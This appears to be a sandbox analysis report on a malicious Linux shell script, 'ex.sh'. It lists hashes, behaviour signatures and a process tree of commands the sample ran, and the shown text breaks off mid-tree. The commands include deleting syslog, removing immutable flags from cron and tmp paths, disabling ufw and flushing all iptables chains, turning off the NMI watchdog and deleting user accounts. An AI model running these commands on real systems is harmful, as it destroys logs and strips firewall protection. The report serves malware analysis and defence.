Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    127s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20221125-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20221125-enkernel:4.15.0-161-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    05/06/2023, 20:37

General

  • Target

    ex.sh

  • Size

    33KB

  • MD5

    64cee920fe0de7406b82e77d2a050643

  • SHA1

    4b9f0472a54a14fb88b67ce15d5771ee59c634eb

  • SHA256

    3859228f749da18c65d0dab3f5efa45485967db2751a5a5ca604d06e5ff0607b

  • SHA512

    5bfc29d014ed5746c015cf4e3695020e66192810227edfd589ab358022df0f8d25d24cd04aa3c3650f47fe6c8fcbe3a4bf05995f484fc8a259678755e8459320

  • SSDEEP

    384:aAC6+7pQwKL//OMHDf6jlpTWg3vMGQiirhv6R+wMeWGj4CC9vEKMvU/4Qdre21j/:S7LzQ5VFNcDAFLcIwgnoYq0xFBrHtguz

Malware Config

Signatures

  • Deletes system logs 1 TTPs 1 IoCs

    Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.

  • Flushes firewall rules 2 IoCs

    Flushes/ disables firewall rules inside the Linux kernel.

  • Loads a kernel module 1 IoCs

    Loads a Linux kernel module, potentially to achieve persistence

  • Attempts to change immutable files 64 IoCs

    Modifies inode attributes on the filesystem to allow changing of immutable files.

  • Creates/modifies Cron job 1 TTPs 11 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads CPU attributes 1 TTPs 49 IoCs
  • Enumerates kernel/hardware configuration 1 TTPs 2 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/ex.sh
    /tmp/ex.sh
    1⤵
    • Writes file to tmp directory
    PID:628
    • /bin/rm
      rm -rf /var/log/syslog
      2⤵
      • Deletes system logs
      PID:629
    • /usr/bin/chattr
      chattr -iua /tmp/
      2⤵
      • Attempts to change immutable files
      PID:630
    • /usr/bin/chattr
      chattr -iua /var/tmp/
      2⤵
      • Attempts to change immutable files
      PID:631
    • /usr/bin/chattr
      chattr -R -i /var/spool/cron
      2⤵
      • Attempts to change immutable files
      PID:632
    • /usr/bin/chattr
      chattr -i /etc/crontab
      2⤵
      • Attempts to change immutable files
      PID:633
    • /usr/sbin/ufw
      ufw disable
      2⤵
      • Flushes firewall rules
      PID:634
      • /sbin/iptables
        /sbin/iptables -V
        3⤵
          PID:635
        • /lib/ufw/ufw-init
          /lib/ufw/ufw-init force-stop
          3⤵
          • Attempts to change immutable files
          PID:640
          • /sbin/ip6tables
            ip6tables -L INPUT -n
            4⤵
              PID:641
              • /sbin/modprobe
                /sbin/modprobe ip6_tables
                5⤵
                • Loads a kernel module
                • Enumerates kernel/hardware configuration
                PID:642
            • /sbin/iptables
              iptables -F ufw-logging-deny
              4⤵
                PID:646
              • /sbin/iptables
                iptables -F ufw-logging-allow
                4⤵
                  PID:649
                • /sbin/iptables
                  iptables -F ufw-not-local
                  4⤵
                    PID:650
                  • /sbin/iptables
                    iptables -F ufw-user-logging-input
                    4⤵
                    • Attempts to change immutable files
                    PID:651
                  • /sbin/iptables
                    iptables -F ufw-user-limit-accept
                    4⤵
                      PID:652
                    • /sbin/iptables
                      iptables -F ufw-user-limit
                      4⤵
                        PID:653
                      • /sbin/iptables
                        iptables -F ufw-skip-to-policy-input
                        4⤵
                          PID:654
                        • /sbin/iptables
                          iptables -F ufw-reject-input
                          4⤵
                          • Attempts to change immutable files
                          PID:655
                        • /sbin/iptables
                          iptables -F ufw-after-logging-input
                          4⤵
                          • Attempts to change immutable files
                          PID:656
                        • /sbin/iptables
                          iptables -F ufw-after-input
                          4⤵
                          • Attempts to change immutable files
                          PID:657
                        • /sbin/iptables
                          iptables -F ufw-user-input
                          4⤵
                            PID:658
                          • /sbin/iptables
                            iptables -F ufw-before-input
                            4⤵
                            • Attempts to change immutable files
                            PID:659
                          • /sbin/iptables
                            iptables -F ufw-before-logging-input
                            4⤵
                            • Attempts to change immutable files
                            PID:660
                          • /sbin/iptables
                            iptables -F ufw-skip-to-policy-forward
                            4⤵
                              PID:661
                            • /sbin/iptables
                              iptables -F ufw-reject-forward
                              4⤵
                                PID:662
                              • /sbin/iptables
                                iptables -F ufw-after-logging-forward
                                4⤵
                                  PID:663
                                • /sbin/iptables
                                  iptables -F ufw-after-forward
                                  4⤵
                                    PID:664
                                  • /sbin/iptables
                                    iptables -F ufw-user-logging-forward
                                    4⤵
                                      PID:665
                                    • /sbin/iptables
                                      iptables -F ufw-user-forward
                                      4⤵
                                        PID:666
                                      • /sbin/iptables
                                        iptables -F ufw-before-forward
                                        4⤵
                                          PID:667
                                        • /sbin/iptables
                                          iptables -F ufw-before-logging-forward
                                          4⤵
                                            PID:668
                                          • /sbin/iptables
                                            iptables -F ufw-track-forward
                                            4⤵
                                              PID:669
                                            • /sbin/iptables
                                              iptables -F ufw-track-output
                                              4⤵
                                                PID:670
                                              • /sbin/iptables
                                                iptables -F ufw-track-input
                                                4⤵
                                                • Attempts to change immutable files
                                                PID:671
                                              • /sbin/iptables
                                                iptables -F ufw-skip-to-policy-output
                                                4⤵
                                                  PID:672
                                                • /sbin/iptables
                                                  iptables -F ufw-reject-output
                                                  4⤵
                                                    PID:673
                                                  • /sbin/iptables
                                                    iptables -F ufw-after-logging-output
                                                    4⤵
                                                      PID:674
                                                    • /sbin/iptables
                                                      iptables -F ufw-after-output
                                                      4⤵
                                                        PID:675
                                                      • /sbin/iptables
                                                        iptables -F ufw-user-logging-output
                                                        4⤵
                                                          PID:676
                                                        • /sbin/iptables
                                                          iptables -F ufw-user-output
                                                          4⤵
                                                            PID:677
                                                          • /sbin/iptables
                                                            iptables -F ufw-before-output
                                                            4⤵
                                                              PID:678
                                                            • /sbin/iptables
                                                              iptables -F ufw-before-logging-output
                                                              4⤵
                                                                PID:679
                                                              • /sbin/iptables
                                                                iptables -Z ufw-logging-deny
                                                                4⤵
                                                                  PID:680
                                                                • /sbin/iptables
                                                                  iptables -Z ufw-logging-allow
                                                                  4⤵
                                                                    PID:681
                                                                  • /sbin/iptables
                                                                    iptables -Z ufw-not-local
                                                                    4⤵
                                                                      PID:682
                                                                    • /sbin/iptables
                                                                      iptables -Z ufw-user-logging-input
                                                                      4⤵
                                                                      • Attempts to change immutable files
                                                                      PID:683
                                                                    • /sbin/iptables
                                                                      iptables -Z ufw-user-limit-accept
                                                                      4⤵
                                                                        PID:684
                                                                      • /sbin/iptables
                                                                        iptables -Z ufw-user-limit
                                                                        4⤵
                                                                          PID:685
                                                                        • /sbin/iptables
                                                                          iptables -Z ufw-skip-to-policy-input
                                                                          4⤵
                                                                            PID:686
                                                                          • /sbin/iptables
                                                                            iptables -Z ufw-reject-input
                                                                            4⤵
                                                                            • Attempts to change immutable files
                                                                            PID:687
                                                                          • /sbin/iptables
                                                                            iptables -Z ufw-after-logging-input
                                                                            4⤵
                                                                            • Attempts to change immutable files
                                                                            PID:688
                                                                          • /sbin/iptables
                                                                            iptables -Z ufw-after-input
                                                                            4⤵
                                                                              PID:689
                                                                            • /sbin/iptables
                                                                              iptables -Z ufw-user-input
                                                                              4⤵
                                                                              • Attempts to change immutable files
                                                                              PID:690
                                                                            • /sbin/iptables
                                                                              iptables -Z ufw-before-input
                                                                              4⤵
                                                                              • Attempts to change immutable files
                                                                              PID:691
                                                                            • /sbin/iptables
                                                                              iptables -Z ufw-before-logging-input
                                                                              4⤵
                                                                                PID:692
                                                                              • /sbin/iptables
                                                                                iptables -Z ufw-skip-to-policy-forward
                                                                                4⤵
                                                                                  PID:693
                                                                                • /sbin/iptables
                                                                                  iptables -Z ufw-reject-forward
                                                                                  4⤵
                                                                                    PID:694
                                                                                  • /sbin/iptables
                                                                                    iptables -Z ufw-after-logging-forward
                                                                                    4⤵
                                                                                      PID:695
                                                                                    • /sbin/iptables
                                                                                      iptables -Z ufw-after-forward
                                                                                      4⤵
                                                                                        PID:696
                                                                                      • /sbin/iptables
                                                                                        iptables -Z ufw-user-logging-forward
                                                                                        4⤵
                                                                                          PID:697
                                                                                        • /sbin/iptables
                                                                                          iptables -Z ufw-user-forward
                                                                                          4⤵
                                                                                            PID:698
                                                                                          • /sbin/iptables
                                                                                            iptables -Z ufw-before-forward
                                                                                            4⤵
                                                                                              PID:699
                                                                                            • /sbin/iptables
                                                                                              iptables -Z ufw-before-logging-forward
                                                                                              4⤵
                                                                                                PID:700
                                                                                              • /sbin/iptables
                                                                                                iptables -Z ufw-track-forward
                                                                                                4⤵
                                                                                                  PID:701
                                                                                                • /sbin/iptables
                                                                                                  iptables -Z ufw-track-output
                                                                                                  4⤵
                                                                                                    PID:702
                                                                                                  • /sbin/iptables
                                                                                                    iptables -Z ufw-track-input
                                                                                                    4⤵
                                                                                                    • Attempts to change immutable files
                                                                                                    PID:703
                                                                                                  • /sbin/iptables
                                                                                                    iptables -Z ufw-skip-to-policy-output
                                                                                                    4⤵
                                                                                                      PID:704
                                                                                                    • /sbin/iptables
                                                                                                      iptables -Z ufw-reject-output
                                                                                                      4⤵
                                                                                                        PID:705
                                                                                                      • /sbin/iptables
                                                                                                        iptables -Z ufw-after-logging-output
                                                                                                        4⤵
                                                                                                          PID:706
                                                                                                        • /sbin/iptables
                                                                                                          iptables -Z ufw-after-output
                                                                                                          4⤵
                                                                                                            PID:707
                                                                                                          • /sbin/iptables
                                                                                                            iptables -Z ufw-user-logging-output
                                                                                                            4⤵
                                                                                                              PID:708
                                                                                                            • /sbin/iptables
                                                                                                              iptables -Z ufw-user-output
                                                                                                              4⤵
                                                                                                                PID:709
                                                                                                              • /sbin/iptables
                                                                                                                iptables -Z ufw-before-output
                                                                                                                4⤵
                                                                                                                  PID:710
                                                                                                                • /sbin/iptables
                                                                                                                  iptables -Z ufw-before-logging-output
                                                                                                                  4⤵
                                                                                                                    PID:711
                                                                                                                  • /sbin/iptables
                                                                                                                    iptables -X ufw-logging-deny
                                                                                                                    4⤵
                                                                                                                      PID:712
                                                                                                                    • /sbin/iptables
                                                                                                                      iptables -X ufw-logging-allow
                                                                                                                      4⤵
                                                                                                                        PID:713
                                                                                                                      • /sbin/iptables
                                                                                                                        iptables -X ufw-not-local
                                                                                                                        4⤵
                                                                                                                          PID:714
                                                                                                                        • /sbin/iptables
                                                                                                                          iptables -X ufw-user-logging-input
                                                                                                                          4⤵
                                                                                                                          • Attempts to change immutable files
                                                                                                                          PID:715
                                                                                                                        • /sbin/iptables
                                                                                                                          iptables -X ufw-user-logging-output
                                                                                                                          4⤵
                                                                                                                            PID:716
                                                                                                                          • /sbin/iptables
                                                                                                                            iptables -X ufw-user-logging-forward
                                                                                                                            4⤵
                                                                                                                              PID:717
                                                                                                                            • /sbin/iptables
                                                                                                                              iptables -X ufw-user-limit-accept
                                                                                                                              4⤵
                                                                                                                                PID:718
                                                                                                                              • /sbin/iptables
                                                                                                                                iptables -X ufw-user-limit
                                                                                                                                4⤵
                                                                                                                                  PID:719
                                                                                                                                • /sbin/iptables
                                                                                                                                  iptables -X ufw-user-input
                                                                                                                                  4⤵
                                                                                                                                    PID:720
                                                                                                                                  • /sbin/iptables
                                                                                                                                    iptables -X ufw-user-forward
                                                                                                                                    4⤵
                                                                                                                                      PID:721
                                                                                                                                    • /sbin/iptables
                                                                                                                                      iptables -X ufw-user-output
                                                                                                                                      4⤵
                                                                                                                                        PID:722
                                                                                                                                      • /sbin/iptables
                                                                                                                                        iptables -X ufw-skip-to-policy-input
                                                                                                                                        4⤵
                                                                                                                                        • Attempts to change immutable files
                                                                                                                                        PID:723
                                                                                                                                      • /sbin/iptables
                                                                                                                                        iptables -X ufw-skip-to-policy-output
                                                                                                                                        4⤵
                                                                                                                                          PID:724
                                                                                                                                        • /sbin/iptables
                                                                                                                                          iptables -X ufw-skip-to-policy-forward
                                                                                                                                          4⤵
                                                                                                                                            PID:725
                                                                                                                                          • /sbin/iptables
                                                                                                                                            iptables -P INPUT ACCEPT
                                                                                                                                            4⤵
                                                                                                                                              PID:726
                                                                                                                                            • /sbin/iptables
                                                                                                                                              iptables -P OUTPUT ACCEPT
                                                                                                                                              4⤵
                                                                                                                                                PID:727
                                                                                                                                              • /sbin/iptables
                                                                                                                                                iptables -P FORWARD ACCEPT
                                                                                                                                                4⤵
                                                                                                                                                  PID:728
                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                  ip6tables -F ufw6-logging-deny
                                                                                                                                                  4⤵
                                                                                                                                                    PID:729
                                                                                                                                                  • /sbin/ip6tables
                                                                                                                                                    ip6tables -F ufw6-logging-allow
                                                                                                                                                    4⤵
                                                                                                                                                      PID:730
                                                                                                                                                    • /sbin/ip6tables
                                                                                                                                                      ip6tables -F ufw6-not-local
                                                                                                                                                      4⤵
                                                                                                                                                        PID:731
                                                                                                                                                      • /sbin/ip6tables
                                                                                                                                                        ip6tables -F ufw6-user-logging-input
                                                                                                                                                        4⤵
                                                                                                                                                        • Attempts to change immutable files
                                                                                                                                                        PID:732
                                                                                                                                                      • /sbin/ip6tables
                                                                                                                                                        ip6tables -F ufw6-user-limit-accept
                                                                                                                                                        4⤵
                                                                                                                                                          PID:733
                                                                                                                                                        • /sbin/ip6tables
                                                                                                                                                          ip6tables -F ufw6-user-limit
                                                                                                                                                          4⤵
                                                                                                                                                            PID:734
                                                                                                                                                          • /sbin/ip6tables
                                                                                                                                                            ip6tables -F ufw6-skip-to-policy-input
                                                                                                                                                            4⤵
                                                                                                                                                              PID:735
                                                                                                                                                            • /sbin/ip6tables
                                                                                                                                                              ip6tables -F ufw6-reject-input
                                                                                                                                                              4⤵
                                                                                                                                                                PID:736
                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                ip6tables -F ufw6-after-logging-input
                                                                                                                                                                4⤵
                                                                                                                                                                • Attempts to change immutable files
                                                                                                                                                                PID:737
                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                ip6tables -F ufw6-after-input
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:738
                                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                                  ip6tables -F ufw6-user-input
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Attempts to change immutable files
                                                                                                                                                                  PID:739
                                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                                  ip6tables -F ufw6-before-input
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Attempts to change immutable files
                                                                                                                                                                  PID:740
                                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                                  ip6tables -F ufw6-before-logging-input
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Attempts to change immutable files
                                                                                                                                                                  PID:741
                                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                                  ip6tables -F ufw6-skip-to-policy-forward
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:742
                                                                                                                                                                  • /sbin/ip6tables
                                                                                                                                                                    ip6tables -F ufw6-reject-forward
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:743
                                                                                                                                                                    • /sbin/ip6tables
                                                                                                                                                                      ip6tables -F ufw6-after-logging-forward
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:744
                                                                                                                                                                      • /sbin/ip6tables
                                                                                                                                                                        ip6tables -F ufw6-after-forward
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:745
                                                                                                                                                                        • /sbin/ip6tables
                                                                                                                                                                          ip6tables -F ufw6-user-logging-forward
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:746
                                                                                                                                                                          • /sbin/ip6tables
                                                                                                                                                                            ip6tables -F ufw6-user-forward
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:747
                                                                                                                                                                            • /sbin/ip6tables
                                                                                                                                                                              ip6tables -F ufw6-before-forward
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:748
                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                ip6tables -F ufw6-before-logging-forward
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:749
                                                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                                                  ip6tables -F ufw6-track-forward
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:750
                                                                                                                                                                                  • /sbin/ip6tables
                                                                                                                                                                                    ip6tables -F ufw6-track-output
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:751
                                                                                                                                                                                    • /sbin/ip6tables
                                                                                                                                                                                      ip6tables -F ufw6-track-input
                                                                                                                                                                                      4⤵
                                                                                                                                                                                      • Attempts to change immutable files
                                                                                                                                                                                      PID:752
                                                                                                                                                                                    • /sbin/ip6tables
                                                                                                                                                                                      ip6tables -F ufw6-skip-to-policy-output
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:753
                                                                                                                                                                                      • /sbin/ip6tables
                                                                                                                                                                                        ip6tables -F ufw6-reject-output
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:754
                                                                                                                                                                                        • /sbin/ip6tables
                                                                                                                                                                                          ip6tables -F ufw6-after-logging-output
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:755
                                                                                                                                                                                          • /sbin/ip6tables
                                                                                                                                                                                            ip6tables -F ufw6-after-output
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:756
                                                                                                                                                                                            • /sbin/ip6tables
                                                                                                                                                                                              ip6tables -F ufw6-user-logging-output
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:757
                                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                                ip6tables -F ufw6-user-output
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:758
                                                                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                                                                  ip6tables -F ufw6-before-output
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:759
                                                                                                                                                                                                  • /sbin/ip6tables
                                                                                                                                                                                                    ip6tables -F ufw6-before-logging-output
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:760
                                                                                                                                                                                                    • /sbin/ip6tables
                                                                                                                                                                                                      ip6tables -Z ufw6-logging-deny
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:761
                                                                                                                                                                                                      • /sbin/ip6tables
                                                                                                                                                                                                        ip6tables -Z ufw6-logging-allow
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                          PID:762
                                                                                                                                                                                                        • /sbin/ip6tables
                                                                                                                                                                                                          ip6tables -Z ufw6-not-local
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:763
                                                                                                                                                                                                          • /sbin/ip6tables
                                                                                                                                                                                                            ip6tables -Z ufw6-user-logging-input
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                            • Attempts to change immutable files
                                                                                                                                                                                                            PID:764
                                                                                                                                                                                                          • /sbin/ip6tables
                                                                                                                                                                                                            ip6tables -Z ufw6-user-limit-accept
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                              PID:765
                                                                                                                                                                                                            • /sbin/ip6tables
                                                                                                                                                                                                              ip6tables -Z ufw6-user-limit
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:766
                                                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                                                ip6tables -Z ufw6-skip-to-policy-input
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                • Attempts to change immutable files
                                                                                                                                                                                                                PID:767
                                                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                                                ip6tables -Z ufw6-reject-input
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                • Attempts to change immutable files
                                                                                                                                                                                                                PID:768
                                                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                                                ip6tables -Z ufw6-after-logging-input
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                  PID:769
                                                                                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                                                                                  ip6tables -Z ufw6-after-input
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                  • Attempts to change immutable files
                                                                                                                                                                                                                  PID:770
                                                                                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                                                                                  ip6tables -Z ufw6-user-input
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                  • Attempts to change immutable files
                                                                                                                                                                                                                  PID:771
                                                                                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                                                                                  ip6tables -Z ufw6-before-input
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                  • Attempts to change immutable files
                                                                                                                                                                                                                  PID:772
                                                                                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                                                                                  ip6tables -Z ufw6-before-logging-input
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                  • Attempts to change immutable files
                                                                                                                                                                                                                  PID:773
                                                                                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                                                                                  ip6tables -Z ufw6-skip-to-policy-forward
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:774
                                                                                                                                                                                                                  • /sbin/ip6tables
                                                                                                                                                                                                                    ip6tables -Z ufw6-reject-forward
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                      PID:775
                                                                                                                                                                                                                    • /sbin/ip6tables
                                                                                                                                                                                                                      ip6tables -Z ufw6-after-logging-forward
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                        PID:776
                                                                                                                                                                                                                      • /sbin/ip6tables
                                                                                                                                                                                                                        ip6tables -Z ufw6-after-forward
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                          PID:777
                                                                                                                                                                                                                        • /sbin/ip6tables
                                                                                                                                                                                                                          ip6tables -Z ufw6-user-logging-forward
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                            PID:778
                                                                                                                                                                                                                          • /sbin/ip6tables
                                                                                                                                                                                                                            ip6tables -Z ufw6-user-forward
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:779
                                                                                                                                                                                                                            • /sbin/ip6tables
                                                                                                                                                                                                                              ip6tables -Z ufw6-before-forward
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                PID:780
                                                                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                                                                ip6tables -Z ufw6-before-logging-forward
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                  PID:781
                                                                                                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                                                                                                  ip6tables -Z ufw6-track-forward
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                    PID:782
                                                                                                                                                                                                                                  • /sbin/ip6tables
                                                                                                                                                                                                                                    ip6tables -Z ufw6-track-output
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                      PID:783
                                                                                                                                                                                                                                    • /sbin/ip6tables
                                                                                                                                                                                                                                      ip6tables -Z ufw6-track-input
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                      • Attempts to change immutable files
                                                                                                                                                                                                                                      PID:784
                                                                                                                                                                                                                                    • /sbin/ip6tables
                                                                                                                                                                                                                                      ip6tables -Z ufw6-skip-to-policy-output
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                        PID:785
                                                                                                                                                                                                                                      • /sbin/ip6tables
                                                                                                                                                                                                                                        ip6tables -Z ufw6-reject-output
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                          PID:786
                                                                                                                                                                                                                                        • /sbin/ip6tables
                                                                                                                                                                                                                                          ip6tables -Z ufw6-after-logging-output
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                            PID:787
                                                                                                                                                                                                                                          • /sbin/ip6tables
                                                                                                                                                                                                                                            ip6tables -Z ufw6-after-output
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                              PID:788
                                                                                                                                                                                                                                            • /sbin/ip6tables
                                                                                                                                                                                                                                              ip6tables -Z ufw6-user-logging-output
                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                PID:789
                                                                                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                                                                                ip6tables -Z ufw6-user-output
                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                  PID:790
                                                                                                                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                                                                                                                  ip6tables -Z ufw6-before-output
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                    PID:791
                                                                                                                                                                                                                                                  • /sbin/ip6tables
                                                                                                                                                                                                                                                    ip6tables -Z ufw6-before-logging-output
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                      PID:792
                                                                                                                                                                                                                                                    • /sbin/ip6tables
                                                                                                                                                                                                                                                      ip6tables -X ufw6-logging-deny
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                        PID:793
                                                                                                                                                                                                                                                      • /sbin/ip6tables
                                                                                                                                                                                                                                                        ip6tables -X ufw6-logging-allow
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                          PID:794
                                                                                                                                                                                                                                                        • /sbin/ip6tables
                                                                                                                                                                                                                                                          ip6tables -X ufw6-not-local
                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                            PID:795
                                                                                                                                                                                                                                                          • /sbin/ip6tables
                                                                                                                                                                                                                                                            ip6tables -X ufw6-user-logging-input
                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                            • Attempts to change immutable files
                                                                                                                                                                                                                                                            PID:796
                                                                                                                                                                                                                                                          • /sbin/ip6tables
                                                                                                                                                                                                                                                            ip6tables -X ufw6-user-logging-output
                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                              PID:797
                                                                                                                                                                                                                                                            • /sbin/ip6tables
                                                                                                                                                                                                                                                              ip6tables -X ufw6-user-logging-forward
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                PID:798
                                                                                                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                                                                                                ip6tables -X ufw6-user-limit-accept
                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                  PID:799
                                                                                                                                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                                                                                                                                  ip6tables -X ufw6-user-limit
                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                    PID:800
                                                                                                                                                                                                                                                                  • /sbin/ip6tables
                                                                                                                                                                                                                                                                    ip6tables -X ufw6-user-input
                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                      PID:801
                                                                                                                                                                                                                                                                    • /sbin/ip6tables
                                                                                                                                                                                                                                                                      ip6tables -X ufw6-user-forward
                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                        PID:802
                                                                                                                                                                                                                                                                      • /sbin/ip6tables
                                                                                                                                                                                                                                                                        ip6tables -X ufw6-user-output
                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                          PID:803
                                                                                                                                                                                                                                                                        • /sbin/ip6tables
                                                                                                                                                                                                                                                                          ip6tables -X ufw6-skip-to-policy-input
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                          • Attempts to change immutable files
                                                                                                                                                                                                                                                                          PID:804
                                                                                                                                                                                                                                                                        • /sbin/ip6tables
                                                                                                                                                                                                                                                                          ip6tables -X ufw6-skip-to-policy-output
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                            PID:805
                                                                                                                                                                                                                                                                          • /sbin/ip6tables
                                                                                                                                                                                                                                                                            ip6tables -X ufw6-skip-to-policy-forward
                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                              PID:806
                                                                                                                                                                                                                                                                            • /sbin/ip6tables
                                                                                                                                                                                                                                                                              ip6tables -P INPUT ACCEPT
                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                PID:807
                                                                                                                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                                                                                                                ip6tables -P OUTPUT ACCEPT
                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                  PID:808
                                                                                                                                                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                                                                                                                                                  ip6tables -P FORWARD ACCEPT
                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                    PID:809
                                                                                                                                                                                                                                                                              • /sbin/iptables
                                                                                                                                                                                                                                                                                iptables -F
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                • Flushes firewall rules
                                                                                                                                                                                                                                                                                PID:810
                                                                                                                                                                                                                                                                              • /usr/bin/sudo
                                                                                                                                                                                                                                                                                sudo sysctl "kernel.nmi_watchdog=0"
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                  PID:811
                                                                                                                                                                                                                                                                                  • /sbin/sysctl
                                                                                                                                                                                                                                                                                    sysctl "kernel.nmi_watchdog=0"
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                      PID:812
                                                                                                                                                                                                                                                                                  • /usr/sbin/userdel
                                                                                                                                                                                                                                                                                    userdel akay
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                      PID:813
                                                                                                                                                                                                                                                                                    • /usr/sbin/userdel
                                                                                                                                                                                                                                                                                      userdel vfinder
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                        PID:814
                                                                                                                                                                                                                                                                                      • /usr/bin/chattr
